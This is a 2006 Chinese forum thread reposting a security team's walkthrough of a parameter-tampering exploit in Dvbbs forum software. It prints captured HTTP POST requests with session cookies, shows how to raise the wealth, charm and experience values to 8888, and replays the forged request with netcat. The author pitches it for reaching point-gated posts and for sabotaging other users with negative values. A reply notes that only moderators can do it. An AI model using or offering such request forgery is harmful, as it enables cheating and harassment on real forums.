中国德迷联盟 - GerFans.cn

 找回密码
 加入联盟

手机号码,快捷登录

动网论坛刷分刷经验漏洞

[复制链接]
 楼主| 德國戰車 发表于 2006-8-6 10:43:09 | 显示全部楼层 |阅读模式
<>文章作者:fhod<BR>信息来源:邪恶八进制信息安全团队(<a href="http://www.eviloctal.com/" target="_blank" >www.eviloctal.com</A>)<BR><BR>动网对admin_postings.asp设置不严..在进行贴子提升时.可以自己定义数字..达到刷分..刷经验及魅力的目的. <BR>比如我有一贴,<BR><a href="http://127.0.0.1/dispbbs.asp?boardID=30&amp;ID=26954&amp;page=1" target="_blank" >http://127.0.0.1/dispbbs.asp?boardID=30&amp;ID=26954&amp;page=1</A><BR>然后对本贴进行提升<BR><a href="http://127.0.0.1/admin_postings.asp?action=" target="_blank" >http://127.0.0.1/admin_postings.asp?action=</A>提升&amp;BoardID=30&amp;ID=26954<BR><BR>默认提升最高的数目是50</P>
<>这时候我们用WSockExpert进行抓包....抓到包为<BR><BR>OST /admin_postings.asp?action=uptopic HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*<BR>Referer: <a href="http://127.0.0.1/admin_postings.asp?action=" target="_blank" >http://127.0.0.1/admin_postings.asp?action=</A>提升&amp;BoardID=30&amp;ID=26954<BR>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)<BR>Host: 127.0.0.1<BR>Content-Length: 141<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: DvForum=UserID=617&amp;usercookies=2&amp;password=hjf87126ffz2C3g7y&amp;userhidden=1&amp;userclass=%B0%E6%D6%F7&amp;username=fhod&amp;StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0<BR><BR>title=%BA%C3%CE%C4%D5%C2&amp;content=%BA%C3&amp;doWealth=50&amp;douserCP=50&amp;douserEP=50&amp;ID=26954&amp;replyID=&amp;boardID=30&amp;msg=&amp;submit=%C8%B7%C8%CF%B2%D9%D7%F7<BR><BR>然后我们来进行修改.<BR>数值修改就在这么一段<BR>doWealth=50&amp;douserCP=50&amp;douserEP=50<BR>我们改为任意一个数...这里我改了doWealth=8888&amp;douserCP=8888&amp;douserEP=8888图个吉利..哈哈.<BR>因为数字修改了..字节也就增加了..我加了6个..所以就做了6个字节..把原来的<BR>Content-Length: 141<BR>改为<BR>Content-Length: 147<BR><BR>完成的就为<BR><BR>OST /admin_postings.asp?action=uptopic HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*<BR>Referer: <a href="http://127.0.0.1/admin_postings.asp?action=" target="_blank" >http://127.0.0.1/admin_postings.asp?action=</A>提升&amp;BoardID=30&amp;ID=26954<BR>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)<BR>Host: 127.0.0.1<BR>Content-Length: 147<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: DvForum=UserID=617&amp;usercookies=2&amp;password=hjf87126ffz2C3g7y&amp;userhidden=1&amp;userclass=%B0%E6%D6%F7&amp;username=fhod&amp;StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0<BR><BR>title=%BA%C3%CE%C4%D5%C2&amp;content=%BA%C3&amp;doWealth=8888&amp;douserCP=8888&amp;douserEP=8888&amp;ID=26954&amp;replyID=&amp;boardID=30&amp;msg=&amp;submit=%C8%B7%C8%CF%B2%D9%D7%F7<BR><BR>然后nc提交<BR><BR>c:\nc 127.0.0.1 80 &lt;1.txt<BR><BR>反复提交几次..得到的结果如下图<BR><BR><BR>本测试过程是以版主身份进行的..普通用户暂为测试....个人想法是..本地假设一BBS..以版主身份登陆..抓取cookie包..然后以普通用户登陆一论坛..发贴抓一包..然后将两个包修改..进行提交..如果admin_postings.asp真的设置不严格..应该同样可以达到此目的...此漏洞利用不大..不过对于那些需要金币或魅力及经验值达多少才可以浏缆的贴的论坛是大有用户啊...当然..你要整某人一下..大可以把数字改为负数..不过要记的把Content-Length:改对哦,</P>
supperbatman 发表于 2006-8-11 13:47:00 | 显示全部楼层
普通用户不行,必须是斑竹
您需要登录后才可以回帖 登录 | 加入联盟

本版积分规则

小黑屋|手机版|Archiver|中国德迷联盟 - GerFans.cn ( 辽ICP备17002255号 )|网站地图

GMT+8, 2024-11-16 09:17 , Processed in 0.025727 second(s), 13 queries , Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表